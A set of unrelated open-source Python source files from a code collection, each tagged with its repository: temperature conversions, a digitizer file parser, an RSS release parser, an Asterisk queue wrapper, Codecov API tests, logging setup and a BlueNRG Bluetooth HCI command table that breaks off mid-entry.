"""Convert Rankine to Celsius.
Parameters
----------
Ra : float
Rankine temperature to be converted.
Returns
-------
C : float
Equivalent Celsius temperature.
Notes
-----
Computes ``C = Ra / 1.8 - zero_Celsius`` where `zero_Celsius` = 273.15,
i.e., (the absolute value of) temperature "absolute zero" as measured in
Celsius.
Examples
--------
>>> R2C(459.67)
-17.777777777777743
"""
return Ra / 1.8 - zero_Celsius
def R2K(Ra):
"""Convert Rankine to Kelvin.
Parameters
----------
Ra : float
Rankine temperature to be converted.
Returns
-------
K : float
Equivalent Kelvin temperature.
Notes
-----
Computes ``K = Ra / 1.8``.
Examples
--------
>>> R2K(491.67)
273.15
"""
return Ra / 1.8
def R2F(Ra):
"""Convert Rankine to Fahrenheit.
Parameters
----------
Ra : float
Rankine temperature to be converted.
Returns
-------
F : float
Equivalent Fahrenheit temperature.
Notes
-----
Computes ``F = Ra + 32 - 1.8 * zero_Celsius`` where `zero_Celsius` = 273.15,
i.e., (the absolute value of) temperature "absolute zero" as measured in
Celsius.
Examples
--------
>>> R2F(491.67)
32.00000000000006
"""
return Ra - 1.8*zero_Celsius + 32.0
def Engauge_2d_parser(lines, flat=False):
    """Not exposed function to read a 2D file generated by engauge-digitizer;
    for curve fitting.

    Each curve is introduced by a header line whose second comma-separated
    field is its z value; data lines follow as "x,y"; a blank line separates
    curves. Returns ``(z_values, x_lists, y_lists)``, or three flat parallel
    lists when `flat` is true.
    """
    z_values = []
    x_lists = []
    y_lists = []
    xs = []
    ys = []
    expect_header = True
    for line in lines:
        if line.strip() == '':
            # Blank line: the next non-blank line starts a new curve.
            expect_header = True
        elif expect_header:
            # Header line: only the z value (second field) is kept.
            z_values.append(float(line.split(',')[1]))
            if xs and ys:
                x_lists.append(xs)
                y_lists.append(ys)
                xs = []
                ys = []
            expect_header = False
        else:
            x, y = [float(v) for v in line.strip().split(',')]
            xs.append(x)
            ys.append(y)
    # Flush the data collected for the final curve.
    x_lists.append(xs)
    y_lists.append(ys)
    if flat:
        all_zs = []
        all_xs = []
        all_ys = []
        for z, xvals, yvals in zip(z_values, x_lists, y_lists):
            for x, y in zip(xvals, yvals):
                all_zs.append(z)
                all_xs.append(x)
                all_ys.append(y)
        return all_zs, all_xs, all_ys
    return z_values, x_lists, y_lists
| CalebBell/fluids | fluids/core.py | Python | mit | 78,285 |
def extractNekocchiblogWordpressCom(item):
    '''
    Parser for 'nekocchiblog.wordpress.com'
    '''
    vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
    # Ignore items with no volume/chapter information, and preview posts.
    if not (chp or vol) or 'preview' in item['title'].lower():
        return None
    # Known tag -> (release name, translation type) mapping.
    tagmap = {
        'PRC': ('PRC', 'translated'),
        'Loiterous': ('Loiterous', 'oel'),
    }
    for tagname, (name, tl_type) in tagmap.items():
        if tagname in item['tags']:
            return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
    return False
| fake-name/ReadableWebProxy | WebMirror/management/rss_parser_funcs/feed_parse_extractNekocchiblogWordpressCom.py | Python | bsd-3-clause | 564 |
# -*- coding: utf-8 -*-
from schedulestorage import Storage
from dbasterisk import DbAsterisk
from scheduling import choosers, Scheduling
import datetime
from yamlns import namespace as ns
class PbxAsterisk(object):
    """Asterisk-backed PBX: resolves the schedule active at a given moment
    from storage and mirrors it onto the Asterisk queue database."""

    def __init__(self, path, *dbargs, **dbkwd):
        # Schedule files live under `path`; remaining arguments configure
        # the Asterisk database connection.
        self.storage = Storage(path)
        self.db = DbAsterisk(*dbargs, **dbkwd)

    def _currentSched(self, when=None):
        """Return the Scheduling in effect at `when` (now by default), or
        None when no schedule is stored for that week."""
        if not when:
            when = datetime.datetime.now()
        week, dow, time = choosers(when)
        try:
            content = self.storage.load(week)
        except KeyError:
            return None
        return Scheduling(content)

    def setSchedQueue(self, when):
        """Load into Asterisk the queue scheduled for `when`; an empty
        queue is set when no schedule exists."""
        sched = self._currentSched(when)
        if sched is None:
            self.db.setQueue('somenergia', [])
            return
        week, dow, time = choosers(when)
        extensions = [
            sched.extension(name)
            for name in sched.peekQueue(dow, time)
        ]
        self.db.setQueue('somenergia', extensions)

    def currentQueue(self):
        """Return the live Asterisk queue as namespaces carrying the person
        `key` and a boolean `paused` flag; empty when no schedule exists."""
        sched = self._currentSched()
        if sched is None:
            return []
        entries = []
        for extension, paused in self.db.queue('somenergia'):
            entries.append(ns(
                key=sched.extensionToName(extension),
                paused=bool(paused),
            ))
        return entries

    def pause(self, name):
        """Pause `name`'s extension in the Asterisk queue."""
        sched = self._currentSched()
        self.db.pause('somenergia', sched.extension(name))

    def resume(self, name):
        """Resume `name`'s extension in the Asterisk queue."""
        sched = self._currentSched()
        self.db.resume('somenergia', sched.extension(name))

    def addLine(self, name):
        """Append `name`'s extension to the Asterisk queue."""
        sched = self._currentSched()
        self.db.add('somenergia', sched.extension(name))
# vim: ts=4 sw=4 et
| Som-Energia/somenergia-phonetimetable | tomatic/pbxasterisk.py | Python | gpl-3.0 | 1,702 |
"""Tests for Codecov API interface."""
from agithub import base as agithub_base
import unittest
from unittest import mock
import env
from apis import codecov
class TestCodecovApi(unittest.TestCase):
  """Unit tests for codecov.CodecovApi with the agithub HTTP layer mocked."""

  def setUp(self):
    super(TestCodecovApi, self).setUp()
    # Stub env.get so the API client sees a fixed repository name.
    mock.patch.object(
        env, 'get', side_effect={
            'GITHUB_REPO': '__repo__',
        }.get).start()
    # Intercept every HTTP request made through the agithub client.
    self.mock_request = mock.patch.object(
        agithub_base.Client, 'request', autospec=True).start()
    self.addCleanup(mock.patch.stopall)
    self.codecov_api = codecov.CodecovApi()

  def testGetAbsoluteCoverageForHead(self):
    # Without a commit hash, coverage is fetched for the main branch.
    self.mock_request.return_value = (200, {
        'commit': {
            'totals': {
                'c': '13.37'
            }
        }
    })
    coverage = self.codecov_api.get_absolute_coverage()
    self.assertEqual(coverage, 13.37)
    self.mock_request.assert_called_once_with(
        self.codecov_api.client, 'GET', '/__repo__/branch/main?limit=1',
        mock.ANY, mock.ANY)

  def testGetAbsoluteCoverageForCommit(self):
    # With an explicit commit hash, the commit endpoint is queried instead.
    self.mock_request.return_value = (200, {
        'commit': {
            'totals': {
                'c': '13.37'
            }
        }
    })
    coverage = self.codecov_api.get_absolute_coverage('test_commit_hash')
    self.assertEqual(coverage, 13.37)
    self.mock_request.assert_called_once_with(
        self.codecov_api.client, 'GET',
        '/__repo__/commits/test_commit_hash?limit=1', mock.ANY, mock.ANY)

  def testGetAbsoluteCoverageError(self):
    # A non-200 response must surface as a CodecovApiError.
    self.mock_request.return_value = (404, {'error': {'reason': 'Not found.'}})
    with self.assertRaises(
        codecov.CodecovApiError,
        msg='Codecov API Exception HTTP 404): Not found.'):
      self.codecov_api.get_absolute_coverage()
| ampproject/amp-github-apps | project-metrics/metrics_service/apis/codecov_test.py | Python | apache-2.0 | 1,772 |
"""
This file is part of imdb-data-parser.
imdb-data-parser is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
imdb-data-parser is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with imdb-data-parser. If not, see <http://www.gnu.org/licenses/>.
"""
import logging
import os.path
def initialize_logger(preferences_map):
    """Configure the root logger with a console handler plus two file
    handlers (errors only, and everything at INFO level).

    Parameters
    ----------
    preferences_map : dict
        Must contain the key ``'output_dir'``: the directory in which
        ``imdbparserError.log`` and ``imdbparserAll.log`` are created.
    """
    logger = logging.getLogger()
    logger.setLevel(logging.INFO)

    output_dir = preferences_map['output_dir']
    # All handlers share the same message format.
    formatter = logging.Formatter("%(levelname)s - %(message)s")

    # Console handler: INFO and above.
    console_handler = logging.StreamHandler()
    console_handler.setLevel(logging.INFO)
    console_handler.setFormatter(formatter)
    logger.addHandler(console_handler)

    # Error file handler: opened lazily (delay=True, a real boolean rather
    # than the truthy string "true") so the file only appears when an error
    # is actually logged.
    error_handler = logging.FileHandler(
        os.path.join(output_dir, "imdbparserError.log"), "w", encoding=None,
        delay=True)
    error_handler.setLevel(logging.ERROR)
    error_handler.setFormatter(formatter)
    logger.addHandler(error_handler)

    # Info file handler: records everything at INFO and above.
    info_handler = logging.FileHandler(
        os.path.join(output_dir, "imdbparserAll.log"), "w")
    info_handler.setLevel(logging.INFO)
    info_handler.setFormatter(formatter)
    logger.addHandler(info_handler)
# -*- coding: utf-8 -*-
# pylint: disable=C0111
# pylint: disable=C0302
import uctypes
from micropython import const
from bluetooth_low_energy.protocols.hci import HCI_MAX_PAYLOAD_SIZE
# Opcode Command Field (OCF) values for the ST BlueNRG vendor-specific
# (ACI) HCI commands, grouped by subsystem.

# --- HAL commands ---
OCF_HAL_GET_FW_BUILD_NUMBER = const(0x0000)
OCF_HAL_WRITE_CONFIG_DATA = const(0x000C)
OCF_HAL_READ_CONFIG_DATA = const(0x000D)
OCF_HAL_SET_TX_POWER_LEVEL = const(0x000F)
OCF_HAL_DEVICE_STANDBY = const(0x0013)
OCF_HAL_LE_TX_TEST_PACKET_NUMBER = const(0x0014)
OCF_HAL_TONE_START = const(0x0015)
OCF_HAL_TONE_STOP = const(0x0016)
OCF_HAL_GET_LINK_STATUS = const(0x0017)
OCF_HAL_GET_ANCHOR_PERIOD = const(0x0019)

# --- Firmware updater commands ---
OCF_UPDATER_START = const(0x0020)
OCF_UPDATER_REBOOT = const(0x0021)
OCF_GET_UPDATER_VERSION = const(0x0022)
OCF_GET_UPDATER_BUFSIZE = const(0x0023)
OCF_UPDATER_ERASE_BLUE_FLAG = const(0x0024)
OCF_UPDATER_RESET_BLUE_FLAG = const(0x0025)
OCF_UPDATER_ERASE_SECTOR = const(0x0026)
OCF_UPDATER_READ_DATA_BLOCK = const(0x0028)
OCF_UPDATER_PROG_DATA_BLOCK = const(0x0027)
OCF_UPDATER_CALC_CRC = const(0x0029)
OCF_UPDATER_HW_VERSION = const(0x002A)

# --- GAP commands ---
OCF_GAP_SET_NON_DISCOVERABLE = const(0x0081)
OCF_GAP_SET_LIMITED_DISCOVERABLE = const(0x0082)
OCF_GAP_SET_DISCOVERABLE = const(0x0083)
OCF_GAP_SET_DIRECT_CONNECTABLE = const(0x0084)
OCF_GAP_SET_IO_CAPABILITY = const(0x0085)
OCF_GAP_SET_AUTH_REQUIREMENT = const(0x0086)
OCF_GAP_SET_AUTHOR_REQUIREMENT = const(0x0087)
OCF_GAP_PASSKEY_RESPONSE = const(0x0088)
OCF_GAP_AUTHORIZATION_RESPONSE = const(0x0089)
OCF_GAP_INIT = const(0x008A)
OCF_GAP_SET_NON_CONNECTABLE = const(0x008B)
OCF_GAP_SET_UNDIRECTED_CONNECTABLE = const(0x008C)
OCF_GAP_SLAVE_SECURITY_REQUEST = const(0x008D)
OCF_GAP_UPDATE_ADV_DATA = const(0x008E)
OCF_GAP_DELETE_AD_TYPE = const(0x008F)
OCF_GAP_GET_SECURITY_LEVEL = const(0x0090)
OCF_GAP_SET_EVT_MASK = const(0x0091)
OCF_GAP_CONFIGURE_WHITELIST = const(0x0092)
OCF_GAP_TERMINATE = const(0x0093)
OCF_GAP_CLEAR_SECURITY_DB = const(0x0094)
OCF_GAP_ALLOW_REBOND_DB = const(0x0095)
OCF_GAP_START_LIMITED_DISCOVERY_PROC = const(0x0096)
OCF_GAP_START_GENERAL_DISCOVERY_PROC = const(0x0097)
OCF_GAP_START_NAME_DISCOVERY_PROC = const(0x0098)
OCF_GAP_START_AUTO_CONN_ESTABLISH_PROC = const(0x0099)
OCF_GAP_START_GENERAL_CONN_ESTABLISH_PROC = const(0x009A)
OCF_GAP_START_SELECTIVE_CONN_ESTABLISH_PROC = const(0x009B)
OCF_GAP_CREATE_CONNECTION = const(0x009C)
OCF_GAP_TERMINATE_GAP_PROCEDURE = const(0x009D)
OCF_GAP_START_CONNECTION_UPDATE = const(0x009E)
OCF_GAP_SEND_PAIRING_REQUEST = const(0x009F)
OCF_GAP_RESOLVE_PRIVATE_ADDRESS = const(0x00A0)
OCF_GAP_SET_BROADCAST_MODE = const(0x00A1)
OCF_GAP_START_OBSERVATION_PROC = const(0x00A2)
OCF_GAP_GET_BONDED_DEVICES = const(0x00A3)
OCF_GAP_IS_DEVICE_BONDED = const(0x00A4)

# --- GATT / ATT commands ---
OCF_GATT_INIT = const(0x0101)
OCF_GATT_ADD_SERV = const(0x0102)
OCF_GATT_INCLUDE_SERV = const(0x0103)
OCF_GATT_ADD_CHAR = const(0x0104)
OCF_GATT_ADD_CHAR_DESC = const(0x0105)
OCF_GATT_UPD_CHAR_VAL = const(0x0106)
OCF_GATT_DEL_CHAR = const(0x0107)
OCF_GATT_DEL_SERV = const(0x0108)
OCF_GATT_DEL_INC_SERV = const(0x0109)
OCF_GATT_SET_EVT_MASK = const(0x010A)
OCF_GATT_EXCHANGE_CONFIG = const(0x010B)
OCF_ATT_FIND_INFO_REQ = const(0x010C)
OCF_ATT_FIND_BY_TYPE_VALUE_REQ = const(0x010D)
OCF_ATT_READ_BY_TYPE_REQ = const(0x010E)
OCF_ATT_READ_BY_GROUP_TYPE_REQ = const(0x010F)
OCF_ATT_PREPARE_WRITE_REQ = const(0x0110)
OCF_ATT_EXECUTE_WRITE_REQ = const(0x0111)
OCF_GATT_DISC_ALL_PRIM_SERVICES = const(0x0112)
OCF_GATT_DISC_PRIM_SERVICE_BY_UUID = const(0x0113)
OCF_GATT_FIND_INCLUDED_SERVICES = const(0x0114)
OCF_GATT_DISC_ALL_CHARAC_OF_SERV = const(0x0115)
OCF_GATT_DISC_CHARAC_BY_UUID = const(0x0116)
OCF_GATT_DISC_ALL_CHARAC_DESCRIPTORS = const(0x0117)
OCF_GATT_READ_CHARAC_VAL = const(0x0118)
# Was const(0x0109), which collided with OCF_GATT_DEL_INC_SERV; the BlueNRG
# ACI opcode for aci_gatt_read_using_charac_uuid is OCF 0x0119.
OCF_GATT_READ_USING_CHARAC_UUID = const(0x0119)
OCF_GATT_READ_LONG_CHARAC_VAL = const(0x011A)
OCF_GATT_READ_MULTIPLE_CHARAC_VAL = const(0x011B)
OCF_GATT_WRITE_CHAR_VALUE = const(0x011C)
OCF_GATT_WRITE_LONG_CHARAC_VAL = const(0x011D)
OCF_GATT_WRITE_CHARAC_RELIABLE = const(0x011E)
OCF_GATT_WRITE_LONG_CHARAC_DESC = const(0x011F)
OCF_GATT_READ_LONG_CHARAC_DESC = const(0x0120)
OCF_GATT_WRITE_CHAR_DESC = const(0x0121)
OCF_GATT_READ_CHAR_DESC = const(0x0122)
OCF_GATT_WRITE_WITHOUT_RESPONSE = const(0x0123)
OCF_GATT_SIGNED_WRITE_WITHOUT_RESPONSE = const(0x0124)
OCF_GATT_CONFIRM_INDICATION = const(0x0125)
OCF_GATT_WRITE_RESPONSE = const(0x0126)
OCF_GATT_ALLOW_READ = const(0x0127)
OCF_GATT_SET_SECURITY_PERMISSION = const(0x0128)
OCF_GATT_SET_DESC_VAL = const(0x0129)
OCF_GATT_READ_HANDLE_VALUE = const(0x012A)
OCF_GATT_READ_HANDLE_VALUE_OFFSET = const(0x012B)
OCF_GATT_UPD_CHAR_VAL_EXT = const(0x012C)

# --- L2CAP commands ---
OCF_L2CAP_CONN_PARAM_UPDATE_REQ = const(0x0181)
OCF_L2CAP_CONN_PARAM_UPDATE_RESP = const(0x0182)
HCI_VENDOR_COMMANDS = [
"VENDOR_CMD",
{
OCF_HAL_GET_FW_BUILD_NUMBER: [
"HAL_GET_FW_BUILD_NUMBER",
None,
{
"status": uctypes.UINT8 | 0,
"build_number": uctypes.UINT16 | 1
}
],
OCF_HAL_WRITE_CONFIG_DATA: [
"HAL_WRITE_CONFIG_DATA",
None,
{
"status": uctypes.UINT8 | 0
}
],
OCF_HAL_READ_CONFIG_DATA: [
"HAL_READ_CONFIG_DATA",
None,
{
"offset": uctypes.UINT8 | 0
}
],
OCF_HAL_SET_TX_POWER_LEVEL: [
"HAL_SET_TX_POWER_LEVEL",
{
"en_high_power": uctypes.UINT8 | 0,
"pa_level": uctypes.UINT8 | 1
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_HAL_DEVICE_STANDBY: [
"HAL_DEVICE_STANDBY",
None,
{
"status": uctypes.UINT8 | 0
}
],
OCF_HAL_LE_TX_TEST_PACKET_NUMBER: [
"HAL_LE_TX_TEST_PACKET_NUMBER",
None,
{
"status": uctypes.UINT8 | 0,
"number_of_packets": uctypes.UINT32 | 1
}
],
OCF_HAL_TONE_START: [
"HAL_TONE_START",
{
"rf_channel": uctypes.UINT8 | 0
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_HAL_TONE_STOP: [
"HAL_TONE_STOP",
{
"rf_channel": uctypes.UINT8 | 0
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_HAL_GET_LINK_STATUS: [
"HAL_GET_LINK_STATUS",
None,
{
"status": uctypes.UINT8 | 0,
"link_status": (uctypes.ARRAY | 1, uctypes.UINT8 | 8),
"conn_handle": (uctypes.ARRAY | 9, uctypes.UINT16 | 8)
}
],
OCF_HAL_GET_ANCHOR_PERIOD: [
"HAL_GET_ANCHOR_PERIOD",
None,
{
"status": uctypes.UINT8 | 0,
"anchor_period": uctypes.UINT32 | 1,
"max_free_slot": uctypes.UINT32 | 5
}
],
OCF_UPDATER_START: [
"UPDATER_START",
None,
{
"status": uctypes.UINT8 | 0
}
],
OCF_UPDATER_REBOOT: [
"UPDATER_REBOOT",
None,
{
"status": uctypes.UINT8 | 0
}
],
OCF_GET_UPDATER_VERSION: [
"GET_UPDATER_VERSION",
None,
{
"status": uctypes.UINT8 | 0,
"version": uctypes.UINT8 | 1
}
],
OCF_GET_UPDATER_BUFSIZE: [
"GET_UPDATER_BUFSIZE",
None,
{
"status": uctypes.UINT8 | 0,
"buffer_size": uctypes.UINT8 | 1
}
],
OCF_UPDATER_ERASE_BLUE_FLAG: [
"UPDATER_ERASE_BLUE_FLAG",
None,
{
"status": uctypes.UINT8 | 0
}
],
OCF_UPDATER_RESET_BLUE_FLAG: [
"UPDATER_RESET_BLUE_FLAG",
None,
{
"status": uctypes.UINT8 | 0
}
],
OCF_UPDATER_ERASE_SECTOR: [
"UPDATER_ERASE_SECTOR",
{
"address": uctypes.UINT32 | 0
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_UPDATER_READ_DATA_BLOCK: [
"UPDATER_READ_DATA_BLOCK",
{
"address": uctypes.UINT32 | 0,
"data_len": uctypes.UINT16 | 4
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_UPDATER_PROG_DATA_BLOCK: [
"UPDATER_PROG_DATA_BLOCK",
{
"address": uctypes.UINT32 | 0,
"data_len": uctypes.UINT16 | 4,
"data":
(uctypes.ARRAY | 6, uctypes.UINT8 | HCI_MAX_PAYLOAD_SIZE - 6)
},
{
"status": uctypes.UINT8 | 0,
"data":
(uctypes.ARRAY | 1, uctypes.UINT8 | HCI_MAX_PAYLOAD_SIZE - 1)
}
],
OCF_UPDATER_CALC_CRC: [
"UPDATER_CALC_CRC",
{
"address": uctypes.UINT32 | 0,
"num_sectors": uctypes.UINT8 | 4
},
{
"status": uctypes.UINT8 | 0,
"crc": uctypes.UINT32 | 1
}
],
OCF_UPDATER_HW_VERSION: [
"UPDATER_HW_VERSION",
None,
{
"status": uctypes.UINT8 | 0,
"version": uctypes.UINT8 | 1
}
],
OCF_GAP_SET_NON_DISCOVERABLE: [
"GAP_SET_NON_DISCOVERABLE",
None,
{
"status": uctypes.UINT8 | 0
}
],
OCF_GAP_SET_LIMITED_DISCOVERABLE: [
"GAP_SET_LIMITED_DISCOVERABLE",
None,
{
"status": uctypes.UINT8 | 0
}
],
OCF_GAP_SET_DISCOVERABLE: [
"GAP_SET_DISCOVERABLE",
None,
{
"status": uctypes.UINT8 | 0
}
],
OCF_GAP_SET_DIRECT_CONNECTABLE: [
"GAP_SET_DIRECT_CONNECTABLE",
{
"IDB05A1": {
"own_bdaddr_type": uctypes.UINT8 | 0,
"directed_adv_type": uctypes.UINT8 | 1,
"direct_bdaddr_type": uctypes.UINT8 | 2,
"direct_bdaddr": (uctypes.ARRAY | 3, uctypes.UINT8 | 6),
"adv_interv_min": uctypes.UINT16 | 9,
"adv_interv_max": uctypes.UINT16 | 11
},
"IDB04A1": {
"own_bdaddr_type": uctypes.UINT8 | 0,
"direct_bdaddr_type": uctypes.UINT8 | 1,
"direct_bdaddr": (uctypes.ARRAY | 2, uctypes.UINT8 | 6)
}
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_GAP_SET_IO_CAPABILITY: [
"GAP_SET_IO_CAPABILITY",
{
"io_capability": uctypes.UINT8 | 0
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_GAP_SET_AUTH_REQUIREMENT: [
"GAP_SET_AUTH_REQUIREMENT",
{
"mitm_mode": uctypes.UINT8 | 0,
"oob_enable": uctypes.UINT8 | 1,
"oob_data": (uctypes.ARRAY | 2, uctypes.UINT8 | 16),
"min_encryption_key_size": uctypes.UINT8 | 18,
"max_encryption_key_size": uctypes.UINT8 | 19,
"use_fixed_pin": uctypes.UINT8 | 20,
"fixed_pin": uctypes.UINT32 | 21,
"bonding_mode": uctypes.UINT8 | 25
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_GAP_SET_AUTHOR_REQUIREMENT: [
"GAP_SET_AUTHOR_REQUIREMENT",
{
"conn_handle": uctypes.UINT16 | 0,
"authorization_enable": uctypes.UINT8 | 2
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_GAP_PASSKEY_RESPONSE: [
"GAP_PASSKEY_RESPONSE",
{
"conn_handle": uctypes.UINT16 | 0,
"passkey": uctypes.UINT32 | 2
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_GAP_AUTHORIZATION_RESPONSE: [
"GAP_AUTHORIZATION_RESPONSE",
{
"conn_handle": uctypes.UINT16 | 0,
"authorize": uctypes.UINT8 | 2
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_GAP_INIT: [
"GAP_INIT",
{
"IDB05A1": {
"role": uctypes.UINT8 | 0,
"privacy_enabled": uctypes.UINT8 | 1,
"device_name_char_len": uctypes.UINT8 | 2
},
"IDB04A1": {
"role": uctypes.UINT8 | 0
}
},
{
"status": uctypes.UINT8 | 0,
"service_handle": uctypes.UINT16 | 1,
"dev_name_char_handle": uctypes.UINT16 | 3,
"appearance_char_handle": uctypes.UINT16 | 5
}
],
OCF_GAP_SET_NON_CONNECTABLE: [
"GAP_SET_NON_CONNECTABLE",
{
"IDB05A1": {
"advertising_event_type": uctypes.UINT8 | 0,
"own_address_type": uctypes.UINT8 | 1
},
"IDB04A1": {
"advertising_event_type": uctypes.UINT8 | 0
}
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_GAP_SET_UNDIRECTED_CONNECTABLE: [
"GAP_SET_UNDIRECTED_CONNECTABLE",
{
"adv_filter_policy": uctypes.UINT8 | 0,
"own_addr_type": uctypes.UINT8 | 1
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_GAP_SLAVE_SECURITY_REQUEST: [
"GAP_SLAVE_SECURITY_REQUEST",
{
"conn_handle": uctypes.UINT16 | 0,
"bonding": uctypes.UINT8 | 2,
"mitm_protection": uctypes.UINT8 | 3
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_GAP_UPDATE_ADV_DATA: [
"GAP_UPDATE_ADV_DATA",
None,
{
"status": uctypes.UINT8 | 0
}
],
OCF_GAP_DELETE_AD_TYPE: [
"GAP_DELETE_AD_TYPE",
{
"ad_type": uctypes.UINT8 | 0
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_GAP_GET_SECURITY_LEVEL: [
"GAP_GET_SECURITY_LEVEL",
None,
{
"status": uctypes.UINT8 | 0,
"mitm_protection": uctypes.UINT8 | 1,
"bonding": uctypes.UINT8 | 2,
"oob_data": uctypes.UINT8 | 3,
"passkey_required": uctypes.UINT8 | 4
}
],
OCF_GAP_SET_EVT_MASK: [
"GAP_SET_EVT_MASK",
{
"evt_mask": uctypes.UINT16 | 0
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_GAP_CONFIGURE_WHITELIST: [
"GAP_CONFIGURE_WHITELIST",
None,
{
"status": uctypes.UINT8 | 0
}
],
OCF_GAP_TERMINATE: [
"GAP_TERMINATE",
{
"handle": uctypes.UINT16 | 0,
"reason": uctypes.UINT8 | 1
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_GAP_CLEAR_SECURITY_DB: [
"GAP_CLEAR_SECURITY_DB",
None,
{
"status": uctypes.UINT8 | 0
}
],
OCF_GAP_ALLOW_REBOND_DB: [
"GAP_ALLOW_REBOND_DB",
{
"conn_handle": uctypes.UINT16 | 0
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_GAP_START_LIMITED_DISCOVERY_PROC: [
"GAP_START_LIMITED_DISCOVERY_PROC",
{
"scan_interval": uctypes.UINT16 | 0,
"scan_window": uctypes.UINT16 | 2,
"own_address_type": uctypes.UINT16 | 2,
"filter_duplicates": uctypes.UINT8 | 5
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_GAP_START_GENERAL_DISCOVERY_PROC: [
"GAP_START_GENERAL_DISCOVERY_PROC",
{
"scan_interval": uctypes.UINT16 | 0,
"scan_window": uctypes.UINT16 | 2,
"own_address_type": uctypes.UINT16 | 2,
"filter_duplicates": uctypes.UINT8 | 5
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_GAP_START_NAME_DISCOVERY_PROC: [
"GAP_START_NAME_DISCOVERY_PROC",
{
"scan_interval": uctypes.UINT16 | 0,
"scan_window": uctypes.UINT16 | 2,
"peer_bdaddr_type": uctypes.UINT8 | 4,
"peer_bdaddr": (uctypes.ARRAY | 5, uctypes.UINT8 | 6),
"own_bdaddr_type": uctypes.UINT8 | 11,
"conn_min_interval": uctypes.UINT16 | 12,
"conn_max_interval": uctypes.UINT16 | 14,
"conn_latency": uctypes.UINT16 | 16,
"supervision_timeout": uctypes.UINT16 | 18,
"min_conn_length": uctypes.UINT16 | 20,
"max_conn_length": uctypes.UINT16 | 22
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_GAP_START_AUTO_CONN_ESTABLISH_PROC: [
"GAP_START_AUTO_CONN_ESTABLISH_PROC",
None,
{
"status": uctypes.UINT8 | 0
}
],
OCF_GAP_START_GENERAL_CONN_ESTABLISH_PROC: [
"GAP_START_GENERAL_CONN_ESTABLISH_PROC",
{
"IDB05A1": {
"scan_type": uctypes.UINT8 | 0,
"scan_interval": uctypes.UINT16 | 1,
"scan_window": uctypes.UINT16 | 3,
"own_address_type": uctypes.UINT8 | 5,
"filter_duplicates": uctypes.UINT8 | 6
},
"IDB04A1": {
"scan_type": uctypes.UINT8 | 0,
"scan_interval": uctypes.UINT16 | 1,
"scan_window": uctypes.UINT16 | 3,
"own_address_type": uctypes.UINT8 | 5,
"filter_duplicates": uctypes.UINT8 | 6,
"reconn_addr": (uctypes.ARRAY | 7, uctypes.UINT8 | 6)
}
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_GAP_START_SELECTIVE_CONN_ESTABLISH_PROC: [
"GAP_START_SELECTIVE_CONN_ESTABLISH_PROC",
{
"scan_type": uctypes.UINT8 | 0,
"scan_interval": uctypes.UINT16 | 1,
"scan_window": uctypes.UINT16 | 3,
"own_address_type": uctypes.UINT8 | 5,
"filter_duplicates": uctypes.UINT8 | 6,
"num_whitelist_entries": uctypes.UINT8 | 7,
"addr_array":
(uctypes.ARRAY | 8, uctypes.UINT8 | HCI_MAX_PAYLOAD_SIZE - 8)
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_GAP_CREATE_CONNECTION: [
"GAP_CREATE_CONNECTION",
{
"scan_interval": uctypes.UINT16 | 0,
"scan_window": uctypes.UINT16 | 2,
"peer_bdaddr_type": uctypes.UINT8 | 4,
"peer_bdaddr": (uctypes.ARRAY | 5, uctypes.UINT8 | 6),
"own_bdaddr_type": uctypes.UINT8 | 11,
"conn_min_interval": uctypes.UINT16 | 12,
"conn_max_interval": uctypes.UINT16 | 14,
"conn_latency": uctypes.UINT16 | 16,
"supervision_timeout": uctypes.UINT16 | 18,
"min_conn_length": uctypes.UINT16 | 20,
"max_conn_length": uctypes.UINT16 | 22
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_GAP_TERMINATE_GAP_PROCEDURE: [
"GAP_TERMINATE_GAP_PROCEDURE",
None,
{
"status": uctypes.UINT8 | 0
}
],
OCF_GAP_START_CONNECTION_UPDATE: [
"GAP_START_CONNECTION_UPDATE",
{
"conn_handle": uctypes.UINT16 | 0,
"conn_min_interval": uctypes.UINT16 | 2,
"conn_max_interval": uctypes.UINT16 | 4,
"conn_latency": uctypes.UINT16 | 6,
"supervision_timeout": uctypes.UINT16 | 8,
"min_conn_length": uctypes.UINT16 | 10,
"max_conn_length": uctypes.UINT16 | 12
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_GAP_SEND_PAIRING_REQUEST: [
"GAP_SEND_PAIRING_REQUEST",
{
"conn_handle": uctypes.UINT16 | 0,
"force_rebond": uctypes.UINT8 | 2
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_GAP_RESOLVE_PRIVATE_ADDRESS: [
"GAP_RESOLVE_PRIVATE_ADDRESS",
{
"IDB05A1": {
"address": (uctypes.ARRAY | 0, uctypes.UINT8 | 6)
},
"IDB04A1": None
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_GAP_SET_BROADCAST_MODE: [
"GAP_SET_BROADCAST_MODE",
{
"adv_interv_min": uctypes.UINT16 | 0,
"adv_interv_max": uctypes.UINT16 | 2,
